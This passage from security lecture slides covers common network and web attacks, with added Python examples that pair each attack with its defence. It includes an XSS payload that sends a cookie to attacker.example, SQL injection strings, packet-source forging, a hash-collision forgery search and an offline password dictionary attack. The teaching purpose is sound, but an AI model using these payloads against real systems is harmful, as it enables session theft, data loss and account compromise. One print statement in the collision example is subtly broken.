technical flaws in the Simple Mail Transfer Protocol (SMTP).
• The target of the attack receives an unmanageably large volume of unsolicited e-mail.
• By sending large e-mails with forged header information, attackers can take
advantage of poorly configured e-mail systems on the Internet (for example open relays)
and trick them into sending many e-mails to an address of the attackers’ choice.
• If many such systems are tricked into participating, the target e-mail address is
buried under thousands or even millions of unwanted e-mails.
• Phishing also arrives by e-mail, but it is a social-engineering attack designed to trick the
user into performing an action (such as clicking a link or entering credentials), rather than
an attempt to overwhelm the user’s mailbox.

49
Communications Interception Attacks
• Domain Name System (DNS) cache poisoning: The intentional corruption of a DNS resolver's
cached records so that lookups for legitimate names return the addresses of illegitimate
Internet locations. Also known as DNS spoofing.
• Packet sniffer: A software program or hardware appliance that can
intercept, copy, and interpret network traffic.
• TCP hijacking: A form of man-in-the-middle attack whereby the
attacker inserts himself into TCP/IP-based communications. TCP/IP is
short for Transmission Control Protocol/Internet Protocol.

50
Packet Sniffer
• Packet Sniffer: A packet sniffer (or simply sniffer) can monitor data traveling
over a network.
• Sniffers can be used both for legitimate network management functions
and for stealing information.
• Unauthorized sniffers can be extremely dangerous to a network’s security
because a purely passive sniffer sends nothing of its own and so is very hard to
detect, and it can be inserted almost anywhere a copy of the traffic is visible.
• This makes them a favorite weapon in the hacker’s arsenal. Sniffers most often
work on TCP/IP networks.
• Sniffers add risk to network communications because many systems and
users still send information on local networks in clear text; encrypting traffic
end to end is what takes the value out of a captured stream.
• A sniffer program shows all the data going by, including passwords, the
data inside files (such as word-processing documents), and sensitive data
from applications.
51
Pharming
• Pharming: The redirection of legitimate user Web traffic to illegitimate
Web sites with the intent to collect personal information.
• Pharming attacks often use Trojans, worms, or other malware to alter how the victim's
machine resolves names (for example the local hosts file or the DNS settings), so that the
valid URL the user types is silently resolved to an illegitimate Web site.
• A form of pharming called Domain Name System (DNS) cache poisoning
targets the Internet DNS system, corrupting legitimate data tables.
• The key difference between pharming and the social engineering attack
called phishing is that the latter requires the user to actively click a link or
button to redirect to the illegitimate site, whereas pharming attacks modify
the user’s traffic without the user’s knowledge or active participation.

52
Spoofing
• Spoofing: A technique for gaining unauthorized access to computers
using a forged or modified source IP address to give the perception
that messages are coming from a trusted host.
• To engage in IP spoofing, hackers use a variety of techniques to obtain trusted
IP addresses and then modify the packet headers (see Figure 2-19) to insert these
forged addresses in the source field.
• Newer routers and firewall arrangements can offer protection against
IP spoofing.
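Worked example (added for this edition; not from the original slides or from Whitman & Mattord): what "modifying the packet header" amounts to for IPv4, and the ingress-filter check a border router can apply. The Python below builds a minimal IPv4 header, overwrites the source address the way a spoofing tool does, recomputes the header checksum so the forged packet still looks well-formed, and then drops it when it arrives from outside claiming an internal source. The addresses and the internal prefixes are constructed for the example.

```python
import ipaddress
import struct

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: ones'-complement sum of the 16-bit words."""
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_ipv4_header(src: str, dst: str, payload_len: int = 0,
                      proto: int = 6, ttl: int = 64, ident: int = 0x1234) -> bytes:
    """A minimal 20-byte IPv4 header (no options) with a valid checksum."""
    fields = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 20 + payload_len, ident, 0x4000, ttl, proto, 0,
                         ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    return fields[:10] + struct.pack("!H", ipv4_checksum(fields)) + fields[12:]

def spoof_source(header: bytes, new_src: str) -> bytes:
    """What a spoofing tool does to a packet it is about to send: overwrite the
    source address field (bytes 12-15) and recompute the checksum so routers on
    the path accept the forged header as well-formed."""
    patched = header[:12] + ipaddress.IPv4Address(new_src).packed + header[16:]
    zeroed = patched[:10] + b"\x00\x00" + patched[12:]
    return zeroed[:10] + struct.pack("!H", ipv4_checksum(zeroed)) + zeroed[12:]

def parse_ipv4_header(header: bytes) -> dict:
    """Decode the fields a filter looks at. A valid header sums to zero when the
    checksum field itself is included in the computation."""
    ver_ihl, _tos, length, _ident, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", header[:20])
    return {
        "version": ver_ihl >> 4,
        "total_length": length,
        "ttl": ttl,
        "protocol": proto,
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "checksum_ok": ipv4_checksum(header[:20]) == 0,
    }

def ingress_filter(header: bytes, internal_nets) -> str:
    """The router/firewall defence the slide alludes to (BCP 38 style ingress
    filtering): a packet arriving on the Internet-facing interface must not
    carry a source address from one of our own internal prefixes."""
    src = ipaddress.IPv4Address(parse_ipv4_header(header)["src"])
    if any(src in ipaddress.IPv4Network(net) for net in internal_nets):
        return "drop"
    return "accept"

if __name__ == "__main__":
    INTERNAL = ["10.0.0.0/8", "192.168.0.0/16"]      # assumed internal prefixes
    genuine = build_ipv4_header("203.0.113.7", "192.0.2.10")
    forged = spoof_source(genuine, "10.0.0.5")        # claims to be an inside host
    print(parse_ipv4_header(forged), ingress_filter(forged, INTERNAL))
```

The filter only catches packets that claim an address from a prefix the router knows it owns; a forged source from some unrelated network passes, which is why anti-spoofing has to be deployed by the network the attacker sends from as well as the one being attacked.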

53
Figure 2-19

54
Man-in-the-middle attacks
• Man-in-the-middle A group of attacks whereby a person intercepts a
communications stream and inserts himself in the conversation to convince each
of the legitimate parties that he is the other communications partner.
• Some man-in-the-middle attacks involve encryption functions.
• Man-in-the-Middle: In the well-known man-in-the-middle attack, an attacker
monitors (or sniffs) packets from the network, modifies them, and inserts them
back into the network.
• In a TCP hijacking attack, also known as session hijacking, the attacker
uses address spoofing to impersonate other legitimate entities on the network. It
allows the attacker to eavesdrop as well as to change, delete, reroute, add, forge,
or divert data.
• A variant of TCP hijacking involves the interception of an encryption key
exchange, which enables the hacker to act as an invisible man in the middle, that
is, an eavesdropper, on encrypted communications. This works only when the key
exchange is unauthenticated: if each party verifies that the public value it received
really came from its peer (for example by checking a signature on it), the substituted
values are detected and the session is aborted.
• Figure 2-20 illustrates these attacks by showing how a hacker uses public and private
encryption keys to intercept messages.
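Worked example (added here; not part of the original slides): the key-exchange interception described above, on a toy Diffie-Hellman exchange in Python. In the unauthenticated exchange Mallory ends up holding one key shared with Alice and a different one shared with Bob, and can decrypt and re-encrypt everything between them; authenticating each public value (here an HMAC under a long-term key Alice and Bob are assumed to share out of band, standing in for a digital signature) makes the substitution detectable. The group parameters are a toy choice for readability, not a standardised group.

```python
import hashlib
import hmac
import secrets

# Toy group: the Mersenne prime 2^127 - 1 and generator 3. Large enough that
# independently derived keys never collide by accident, but an illustration
# only; real systems use standardised 2048-bit (or larger) groups or curves.
P = 2**127 - 1
G = 3

def dh_private() -> int:
    return secrets.randbelow(P - 3) + 2             # uniform in [2, P-2]

def dh_public(priv: int) -> int:
    return pow(G, priv, P)

def dh_key(peer_public: int, priv: int) -> bytes:
    """Session key = SHA-256 of the shared secret g^(ab) mod p."""
    shared = pow(peer_public, priv, P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()

def unauthenticated_exchange():
    """Alice and Bob exchange bare public values. Mallory, on the path between
    them, swaps in her own values, so each victim unknowingly agrees a key with
    Mallory rather than with the other party."""
    a, b = dh_private(), dh_private()
    m1, m2 = dh_private(), dh_private()             # Mallory's two private values
    A, B = dh_public(a), dh_public(b)
    M1, M2 = dh_public(m1), dh_public(m2)
    alice_key = dh_key(M1, a)        # Alice believes M1 is Bob's public value
    bob_key = dh_key(M2, b)          # Bob believes M2 is Alice's public value
    mallory_alice = dh_key(A, m1)    # Mallory's key towards Alice
    mallory_bob = dh_key(B, m2)      # Mallory's key towards Bob
    return alice_key, bob_key, mallory_alice, mallory_bob

def authenticate(public_value: int, auth_key: bytes) -> bytes:
    """Stand-in for a digital signature on the public value: an HMAC under a
    long-term key Alice and Bob are assumed to share out of band."""
    return hmac.new(auth_key, public_value.to_bytes(16, "big"), hashlib.sha256).digest()

def authenticated_exchange(tamper: bool):
    """Bob sends (B, tag). If Mallory replaces B she cannot produce a matching
    tag, so Alice rejects the value. Returns (alice_key, bob_key), or None when
    the substitution is detected."""
    auth_key = secrets.token_bytes(32)              # assumed pre-shared long-term key
    a, b = dh_private(), dh_private()
    A, B = dh_public(a), dh_public(b)
    tag = authenticate(B, auth_key)
    received = dh_public(dh_private()) if tamper else B   # Mallory's substitute, or the real B
    if not hmac.compare_digest(tag, authenticate(received, auth_key)):
        return None                                 # substitution detected: abort
    return dh_key(received, a), dh_key(A, b)

if __name__ == "__main__":
    ak, bk, ma, mb = unauthenticated_exchange()
    print("Alice's key == Mallory's key towards Alice:", ak == ma)
    print("Bob's key   == Mallory's key towards Bob:  ", bk == mb)
    print("Alice and Bob actually share a key:        ", ak == bk)
    print("Authenticated exchange under tampering:    ", authenticated_exchange(tamper=True))
```

The point the check makes is that confidentiality of the channel is worthless without authentication of the party at the other end; in TLS this role is played by the server's certificate and signature over the handshake.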
55
Figure 2-20 Man-in-the-middle attacks

56
Cross-Site Scripting Attack
• Cross-Site Scripting (XSS): Cross-site scripting lets the attacker run script of his
choosing in a victim’s browser, in the security context of a site the victim trusts, and so
acquire valuable information such as session cookies, account credentials, account
numbers, or other critical data.
• Often an attacker encodes a malicious link and places it on the target
server, making it look less suspicious.
• After the data is collected by the hostile script, it can return what
appears to be a valid response from the intended server, so the victim notices nothing.

57
Cross-site scripting (XSS) attack

• XSS attacks use a trusted site as the vehicle for running attacker-supplied script in
the victim’s web browser or scriptable application.
• In the stored (persistent) variant, the attacker injects a payload containing malicious
JavaScript into a website’s database, for example through a comment or profile field.
• When the victim requests a page from the website, the website transmits the
page, with the attacker’s payload as part of the HTML body, to the victim’s
browser, which executes the malicious script.
• For example, it might send the victim’s cookie to the attacker’s server, and the
attacker can extract it and use it for session hijacking.
• The most dangerous consequences occur when XSS is used to exploit additional
vulnerabilities.
• These vulnerabilities can enable an attacker to not only steal cookies, but also log
key strokes, capture screenshots, discover and collect network information, and
remotely access and control the victim’s machine.
58
Cross-site scripting (XSS) attack

59
Cross-site scripting (XSS) attack

• While XSS can be taken advantage of within VBScript, ActiveX and
Flash, the most widely abused is JavaScript, primarily because
JavaScript is supported widely on the web.
• To defend against XSS attacks, developers must treat data supplied in an HTTP
request as untrusted and encode it for the context in which it is placed before
reflecting it back.
• Make sure all data is validated, filtered, or escaped before echoing
anything back to the user, such as the values of query parameters
during searches.
• Convert special characters such as ?, &, /, <, >, quotes and spaces to their
respective HTML or URL encoded equivalents, depending on whether the value lands in
HTML content, an attribute, or a URL. Give users the option to disable client-side scripts.
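Worked example (added here; not from the original slides): the encoding advice above applied to a toy search page in Python, rendered first by splicing untrusted values straight into the HTML and then with context-appropriate encoding. The stored comment, the attacker host (attacker.example) and the reflected query are all constructed for the example.

```python
import html
from urllib.parse import quote

# Constructed "database": comments a site stores and later displays. The second
# one is a stored XSS payload that sends the session cookie to a host the
# attacker controls (attacker.example is a made-up name).
COMMENTS = [
    "Great article!",
    "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
]

def render_vulnerable(search_term: str, comments) -> str:
    """Splices the query string and the stored comments into the HTML verbatim,
    so both reflected (search_term) and stored (comments) XSS go through."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return f"<p>Results for {search_term}</p><ul>{items}</ul>"

def render_safe(search_term: str, comments) -> str:
    """Encode on output, per context: HTML-escape values placed in element
    content (quote=True also covers ' and \" for attribute positions) and
    percent-encode the value that is placed inside a URL."""
    safe_term = html.escape(search_term, quote=True)
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    again = f'<a href="/search?q={quote(search_term, safe="")}">search again</a>'
    return f"<p>Results for {safe_term}</p><ul>{items}</ul>{again}"

def has_unescaped_script(page: str) -> bool:
    """Crude check used only to compare the two renderers: does the page still
    contain a raw <script tag? (Real testing drives a browser or a DOM parser.)"""
    return "<script" in page.lower()

if __name__ == "__main__":
    reflected = '"><script>alert(document.domain)</script>'
    print(render_vulnerable(reflected, COMMENTS))
    print(render_safe(reflected, COMMENTS))
```

Note that input validation alone would not have saved the vulnerable renderer: the stored comment was accepted long before the page was built, so the decisive control is escaping at the point of output, and it has to match the context (HTML-escaping a value dropped inside a URL or a JavaScript string is not enough).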
60
SQL Injection attack
• SQL Injection: SQL injection occurs when developers fail to properly validate user input
before using it to build a query against a relational database.
• For example, a fairly innocuous program fragment might expect the user to input a user
ID and then perform a SQL query against the USERS table to retrieve the associated
name:
    Accept USER-ID from console;
    SELECT USERID, NAME FROM USERS WHERE USERID = USER-ID;
• This is very straightforward SQL syntax; when used correctly, it displays the user ID and
name.
• The problem is that the string accepted from the user is concatenated directly into the
SQL command text that is sent to the database server.
• What if an attacker enters the string “JOE OR 1 = 1” (or, where the program wraps the
value in quotes, “JOE' OR '1'='1”)? The resulting statement contains valid SQL that returns
all rows from the table where the user ID is either “JOE” or “1 = 1.” Because one is always
equal to one, the system returns every user ID and name.
• The possible effects of the hacker’s “injection” of SQL code into the program are not
limited to improper access to information: what if the attacker included SQL commands
to drop the USERS table, or even shut down the database? The fix is to pass user input to
the database as a bound parameter rather than as part of the query text.
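Worked example (added here; not from the original slides): the USERS lookup above coded two ways in Python against an in-memory SQLite database with constructed rows, the attacker's quoted payload run against each, and the stacked DROP TABLE case from the last bullet.

```python
import sqlite3

def setup_db() -> sqlite3.Connection:
    """In-memory USERS table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (USERID TEXT PRIMARY KEY, NAME TEXT)")
    conn.executemany("INSERT INTO USERS VALUES (?, ?)", [
        ("JOE", "Joe Bloggs"), ("ANN", "Ann Example"), ("SYS", "Service Account"),
    ])
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id: str):
    """The slide's fragment as it is typically coded: the console input is
    spliced into the SQL text, so quote characters in it become part of the
    statement's structure."""
    sql = f"SELECT USERID, NAME FROM USERS WHERE USERID = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id: str):
    """Bound parameter: the driver ships the value separately from the query
    text, so no input can change what the statement does."""
    return conn.execute(
        "SELECT USERID, NAME FROM USERS WHERE USERID = ?", (user_id,)
    ).fetchall()

def stacked_drop_attempt(conn) -> bool:
    """The slide's worst case: input that appends DROP TABLE. Python's sqlite3
    driver refuses more than one statement per execute(), so here the table
    survives; many other drivers and DBMSs would happily run both statements.
    Returns True if USERS still exists afterwards."""
    try:
        lookup_vulnerable(conn, "'; DROP TABLE USERS; --")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        pass                                      # driver rejected the second statement
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'USERS'"
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = setup_db()
    print(lookup_vulnerable(db, "JOE"))
    print(lookup_vulnerable(db, "JOE' OR '1'='1"))    # every row comes back
    print(lookup_safe(db, "JOE' OR '1'='1"))          # no such user: empty list
    print("USERS table survived:", stacked_drop_attempt(db))
```

Do not read the surviving table as a defence: the driver's one-statement rule is an implementation detail, and the `OR '1'='1'` case shows that a single statement is already enough to read the whole table. Parameterised queries are the control.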

61
Drive-by attacks
• A drive-by download attack refers to the unintentional download of malicious code to your computer or
mobile device that leaves you open to a cyberattack.
• You don't have to click on anything, press download, or open a malicious email attachment to become
infected; unlike many other types of attack, a drive-by does not rely on the user doing anything to
enable it.
• Drive-by download attacks are a common method of spreading malware.
• Hackers look for insecure websites and plant a malicious script into the HTML or server-side (for
example PHP) code of one of the pages.
• This script might install malware directly onto the computer of someone who visits the site, or it might
redirect the victim to a site controlled by the hackers.
• Drive-by downloads can happen when visiting a website or viewing an email message or a pop-up window.
• A drive-by download takes advantage of an app, operating system, or web browser that contains security
flaws because of failed or missing updates; the planted script exploits the flaw to run code without any
prompt to the user.

62
Drive-by attacks
• To protect yourself from drive-by attacks, you need to keep your
browsers and operating systems up to date and avoid websites that
might contain malicious code.
• Stick to the sites you normally use — although keep in mind that even
these sites can be hacked. Don’t keep too many unnecessary
programs and apps on your device.
• The more plug-ins you have, the more vulnerabilities there are that
can be exploited by drive-by attacks.

63
Drive-by downloads
• Silently installs software when a web page is loaded.
• Attackers increase exposure by compromising other sites and inserting code into them.
• Site owners are unaware they are participating in an attack.
• Source: Provos et al., "All Your iFRAMEs Point to Us".
64
Eavesdropping attack
• An eavesdropping attack, also known as a sniffing or snooping attack,
is a theft of information as it is transmitted over a network by a
computer, smartphone, or another connected device.
• The attack takes advantage of unsecured network communications to
access data as it is being sent or received by its user.
• Eavesdropping attacks occur through the interception of network
traffic.
• By eavesdropping, an attacker can obtain passwords, credit card
numbers and other confidential information that a user might be
sending over the network.

65
Eavesdropping can be passive or active
• Eavesdropping can be passive or active:
• Passive eavesdropping — A hacker detects the information by listening to the message
transmission in the network.
• Active eavesdropping — A hacker actively grabs the information by disguising himself as a
friendly unit and sending queries to transmitters. This is called probing, scanning, or
tampering.
• Detecting passive eavesdropping attacks is often more important than spotting
active ones, since active attacks require the attacker to first learn about the
friendly units by passive eavesdropping.
• Data encryption is the best countermeasure for eavesdropping, provided the endpoints
are authenticated so that the eavesdropper cannot simply insert himself as one of them
(see the man-in-the-middle discussion above).

66
Birthday attack
• Birthday attacks are made against hash algorithms that are used to
verify the integrity of a message, software, or digital signature.
• A message processed by a hash function produces a message digest
(MD) of fixed length, independent of the length of the input
message; the MD is meant to identify the message in practice, but because the
digest is shorter than most messages, distinct messages with the same digest
(collisions) must exist.
• The birthday attack refers to the probability of finding two random
messages that generate the same MD when processed by a hash
function. For an n-bit digest, roughly 2^(n/2) trials suffice rather than the 2^n a
naive search would need, which is why a digest must be at least twice as long as
the security level it is meant to provide (for example 256-bit SHA-256 for
128-bit collision resistance).
• If an attacker finds a message of his own with the same MD as the user's,
he can replace the user’s message with his, and the receiver
will not be able to detect the replacement even if he compares
MDs.
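Worked example (added here; not from the original slides): the birthday bound measured in Python on SHA-256 truncated to a small number of bits so the search finishes in seconds, plus the substitution scenario from the last bullet carried out as a two-set search over harmless-looking variants of a benign and a malicious document. The two documents and the variant trick (single versus double spaces) are constructed for the example.

```python
import hashlib
import math

def truncated_digest(message: bytes, bits: int) -> int:
    """SHA-256 truncated to its top `bits` bits, standing in for a short hash.
    Truncation only makes the experiment finish in seconds; the same statistics
    apply to a full-length digest, just with 2^(n/2) far out of reach."""
    full = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return full >> (256 - bits)

def expected_trials(bits: int) -> float:
    """Birthday bound: about sqrt(pi/2 * 2^n) random inputs before two collide."""
    return math.sqrt(math.pi / 2 * 2 ** bits)

def find_collision(bits: int, prefix: bytes = b"msg-"):
    """Hash distinct messages until two share a truncated digest.
    Returns (message_a, message_b, digest, trials)."""
    seen = {}
    n = 0
    while True:
        msg = prefix + str(n).encode()
        d = truncated_digest(msg, bits)
        if d in seen:
            return seen[d], msg, d, n + 1
        seen[d] = msg
        n += 1

# Constructed documents for the forgery scenario on the slide: the victim signs
# the digest of the benign text; the attacker wants that same signature to
# cover the malicious text.
BENIGN = ("I, the undersigned, agree to pay the bearer the sum of one hundred dollars "
          "on the first day of next month, with no further obligation of any kind whatsoever.")
MALICIOUS = ("I, the undersigned, agree to pay the bearer the sum of one million dollars "
             "on the first day of next month, with no further obligation of any kind whatsoever.")

def variants(text: str, k: int):
    """Yield 2**k renderings of `text` that read identically: each of its first
    k inter-word spaces is either left single or doubled."""
    words = text.split(" ")
    assert len(words) > k, "need more than k spaces to vary"
    for i in range(2 ** k):
        out = words[0]
        for j in range(1, len(words)):
            doubled = j <= k and (i >> (j - 1)) & 1
            out += ("  " if doubled else " ") + words[j]
        yield out.encode()

def birthday_forgery(bits: int, k_benign: int, k_malicious: int):
    """Two-set birthday attack: tabulate the digests of 2**k_benign harmless
    variants, then walk up to 2**k_malicious malicious variants looking for a
    match. With k_benign + k_malicious comfortably above `bits`, a hit is all
    but certain. Returns (benign, malicious, digest, malicious_trials) or None."""
    table = {truncated_digest(v, bits): v for v in variants(BENIGN, k_benign)}
    for n, v in enumerate(variants(MALICIOUS, k_malicious), 1):
        d = truncated_digest(v, bits)
        if d in table:
            return table[d], v, d, n
    return None

if __name__ == "__main__":
    a, b, d, trials = find_collision(32)
    print(f"32-bit collision after {trials} trials (expected about {expected_trials(32):.0f})")
    hit = birthday_forgery(28, 15, 18)
    print("forgery found after", hit[3], "malicious variants" if hit else "no forgery")
```

The two-set variant is what makes the attack practical for a signer: the attacker only needs the victim to sign one of the 2^k innocent-looking variants, and whitespace, synonyms or formatting give far more than 2^(n/2) such variants for any digest short enough to be attackable.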

67
Malware attack

• Malicious software can be described as unwanted software that is
installed in your system without your consent. It can attach itself to
legitimate code and propagate; it can lurk in useful applications or
replicate itself across the Internet.
• Here are some of the most common types of malware:
• Macro viruses — These viruses infect applications such as Microsoft
Word or Excel. Macro viruses attach to an application’s initialization
sequence. When the application is opened, the virus executes
instructions before transferring control to the application. The virus
replicates itself and attaches to other code in the computer system.

68
Malware attack…
• File infectors — File infector viruses usually attach themselves to
executable code, such as .exe files. The virus is installed when the
code is loaded. Another version of a file infector (a companion virus) does not
modify the target at all: it creates a virus file with the same name but a different
extension that the operating system’s search order runs first (classically a .com file
alongside an .exe). Therefore, when the user runs the program by name, the virus code
executes.
• System or boot-record infectors — A boot-record virus attaches to
the master boot record on hard disks. When the system is started, it
will look at the boot sector and load the virus into memory, where it
can propagate to other disks and computers.

69
Malware attack…
• Polymorphic viruses — These viruses conceal themselves through varying cycles
of encryption and decryption. The encrypted virus and an associated mutation
engine are initially decrypted by a decryption program. The virus proceeds to
infect an area of code. The mutation engine then develops a new decryption
routine and the virus encrypts the mutation engine and a copy of the virus with
an algorithm corresponding to the new decryption routine. The encrypted
package of mutation engine and virus is attached to new code, and the process
repeats. Such viruses are difficult to detect by byte-pattern signatures, because
every generation looks different, but the encrypted body has a high level of entropy
(its bytes are close to uniformly distributed). Anti-virus software or free tools like
Process Hacker can use this feature to detect them.
• Stealth viruses — Stealth viruses take over system functions to conceal
themselves. They do this by compromising malware detection software so that
the software will report an infected area as being uninfected. These viruses
conceal any increase in the size of an infected file or changes to the file’s date and
time of last modification.
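Worked example (added here; not from the original slides): the entropy property used to spot an encrypted or polymorphic body, as a Python scan over a constructed sample file. The "virus" encryption layer is a stand-in keystream built from SHA-256 in counter mode, and the sample file and its section layout are invented for the example.

```python
import hashlib
import math

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for a perfectly flat histogram."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def keystream_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Stand-in for the virus's encryption layer: a counter-mode keystream from
    SHA-256. Each generation re-encrypts under a new key, so byte-pattern
    signatures fail, but the ciphertext stays statistically flat."""
    out = bytearray()
    for i in range(0, len(plaintext), 32):
        ks = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out.extend(p ^ k for p, k in zip(plaintext[i:i + 32], ks))
    return bytes(out)

def scan_for_packed_regions(data: bytes, window: int = 512, threshold: float = 7.0):
    """Slide a fixed window over the file and report (offset, entropy) for every
    window above the threshold. Plain code and text sit well below 7 bits/byte;
    encrypted or compressed bodies approach 8."""
    hits = []
    for off in range(0, len(data) - window + 1, window):
        h = shannon_entropy(data[off:off + window])
        if h > threshold:
            hits.append((off, round(h, 2)))
    return hits

# Constructed sample file: a zero-filled header, a plaintext section (what the
# decryption stub and ordinary code look like statistically), the encrypted
# virus body, and zero padding.
_TEXT = (b"mov eax, [esi]; xor eax, ebx; stosd; loop decrypt_next ; "
         b"The quick brown fox jumps over the lazy dog. ") * 25
_PLAIN_SECTION = _TEXT[:1024]
_ENCRYPTED_BODY = keystream_encrypt(_TEXT[1024:2048], b"generation-17-key")
SAMPLE_FILE = b"\x00" * 512 + _PLAIN_SECTION + _ENCRYPTED_BODY + b"\x00" * 512

if __name__ == "__main__":
    for off, h in scan_for_packed_regions(SAMPLE_FILE):
        print(f"high-entropy window at offset {off}: {h} bits/byte")
```

High entropy is a heuristic, not a verdict: legitimately compressed or encrypted resources trip it too, so a scanner uses it to decide where to spend emulation effort (letting the decryption stub run and scanning the result), not as the detection itself.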

70
Malware attack….
• Trojans — A Trojan or a Trojan horse is a program that hides in a useful program and
usually has a malicious function. A major difference between viruses and Trojans is that
Trojans do not self-replicate. In addition to launching attacks on a system, a Trojan can
establish a back door that can be exploited by attackers. For example, a Trojan can be
programmed to open a high-numbered port so the hacker can use it to listen and then
perform an attack.
• Logic bombs — A logic bomb is a type of malicious software that is appended to an
application and is triggered by a specific occurrence, such as a logical condition or a
specific date and time.
• Worms — Worms differ from viruses in that they do not attach to a host file, but are self-
contained programs that propagate across networks and computers. Worms are
commonly spread through email attachments; opening the attachment activates the
worm program. A typical worm exploit involves the worm sending a copy of itself to
every contact in an infected computer’s email address book. In addition to conducting
malicious activities, a worm spreading across the internet and overloading email servers
can result in denial-of-service attacks against nodes on the network.

71
Malware attack…
• Droppers — A dropper is a program used to install viruses on computers. In
many instances, the dropper itself contains no malicious code and,
therefore, might not be detected by virus-scanning software. A dropper can
also connect to the internet and download updates to malware that is already
resident on a compromised system.
• Ransomware — Ransomware is a type of malware that blocks access to
the victim’s data and threatens to publish or delete it unless a ransom is
paid. While some simple computer ransomware can lock the system in a
way that is not difficult for a knowledgeable person to reverse, more
advanced malware uses a technique called cryptoviral extortion, which
encrypts the victim’s files in a way that makes them nearly impossible to
recover without the decryption key.

72
Malware attack…
• Adware — Adware is a software application used by companies for
marketing purposes; advertising banners are displayed while any program
is running. Adware can be automatically downloaded to your system while
browsing any website and can be viewed through pop-up windows or
through a bar that appears on the computer screen automatically.
• Spyware — Spyware is a type of program that is installed to collect
information about users, their computers or their browsing habits. It tracks
everything you do without your knowledge and sends the data to a remote
user. It also can download and install other malicious programs from the
internet. Spyware works like adware but is usually a separate program that
is installed unknowingly when you install another freeware application.

73
Password attack
• Because passwords are the most commonly used mechanism to
authenticate users to an information system, obtaining passwords is a
common and effective attack approach.
• Access to a person’s password can be obtained by looking around the
person’s desk, “sniffing” the connection to the network to acquire
unencrypted passwords, using social engineering, gaining access to a
password database, or outright guessing.
• The last approach can be done in either a random or systematic manner:
• Brute-force password guessing means trying many candidate passwords (exhaustively, or
at random) and hoping that one works. Some logic can be applied by trying passwords
related to the person’s name, job title, hobbies, or similar items.
• In a dictionary attack, a list of common passwords is used to attempt to gain
access to a user’s computer and network. One offline approach is to copy the file that
contains the hashed passwords, apply the same hash function (with each account’s salt) to a
dictionary of commonly used passwords, and compare the results.
To protect yourself from online dictionary or brute-force attacks, implement an account
lockout policy that locks the account after a few invalid password attempts. Lockout does
not help once the password file has been stolen; for that, passwords must be stored with a
salted, deliberately slow hash (such as bcrypt, scrypt, Argon2, or PBKDF2) so that every
guess is expensive.
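Worked example (added here; not from the original slides): the hashed-file dictionary attack from the last bullet run in Python against a constructed password table, the same attack against a deliberately slow password hash, and the account-lockout policy as the online control. The wordlist and the three accounts are invented for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist and accounts. Two users chose passwords that appear in
# the dictionary; the third did not.
DICTIONARY = ["123456", "password", "letmein", "qwerty", "Summer2023", "dragon"]
CREDENTIALS = [("alice", "Summer2023"), ("bob", "letmein"), ("carol", "xQ9#v!2pLm7&wz")]

def fast_hash(salt: bytes, password: str) -> bytes:
    """Salted but fast: one SHA-256 per guess, so an attacker holding the file
    can test millions of candidates per second."""
    return hashlib.sha256(salt + password.encode()).digest()

def slow_hash(salt: bytes, password: str, iterations: int = 100_000) -> bytes:
    """Purpose-built password hash (PBKDF2 here; bcrypt/scrypt/Argon2 in
    practice): the dictionary attack still works, but each guess costs about
    100,000 times more CPU."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

def make_store(hash_fn, credentials):
    """Simulated password table: user -> (salt, hash). Per-user salts mean the
    dictionary has to be re-hashed for every account rather than once."""
    store = {}
    for user, pw in credentials:
        salt = os.urandom(16)
        store[user] = (salt, hash_fn(salt, pw))
    return store

def dictionary_attack(store, wordlist, hash_fn):
    """Offline attack from the slide: hash each dictionary word under each
    user's salt and compare with the stored value. Returns {user: password}."""
    cracked = {}
    for user, (salt, stored) in store.items():
        for guess in wordlist:
            if hmac.compare_digest(hash_fn(salt, guess), stored):
                cracked[user] = guess
                break
    return cracked

class LockoutPolicy:
    """Online defence from the slide: lock the account after `threshold`
    consecutive failures. This only throttles guessing through the login
    interface; it does nothing against offline cracking of a stolen hash file."""

    def __init__(self, store, hash_fn, threshold: int = 5):
        self.store, self.hash_fn, self.threshold = store, hash_fn, threshold
        self.failures = {}

    def login(self, user: str, password: str) -> str:
        if self.failures.get(user, 0) >= self.threshold:
            return "locked"
        salt, stored = self.store[user]
        if hmac.compare_digest(self.hash_fn(salt, password), stored):
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "denied"

if __name__ == "__main__":
    store = make_store(fast_hash, CREDENTIALS)
    print("cracked with fast hash:", dictionary_attack(store, DICTIONARY, fast_hash))
    guard = LockoutPolicy(store, fast_hash, threshold=3)
    for guess in ["123456", "password", "qwerty", "letmein"]:
        print("bob /", guess, "->", guard.login("bob", guess))
```

Running the slow-hash variant shows the trade-off in practice: the same two accounts fall, but the attacker pays for every iteration on every guess, which is the only lever a defender has once the file is gone. The lockout, by contrast, turns the fourth attempt against bob into "locked" even though that attempt used the right password, which is also why lockout thresholds need an unlock path and why attackers sometimes use them deliberately as a denial of service.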

74
References
• Whitman, M. E. & Mattord, H. J. (2017) Principles of Information
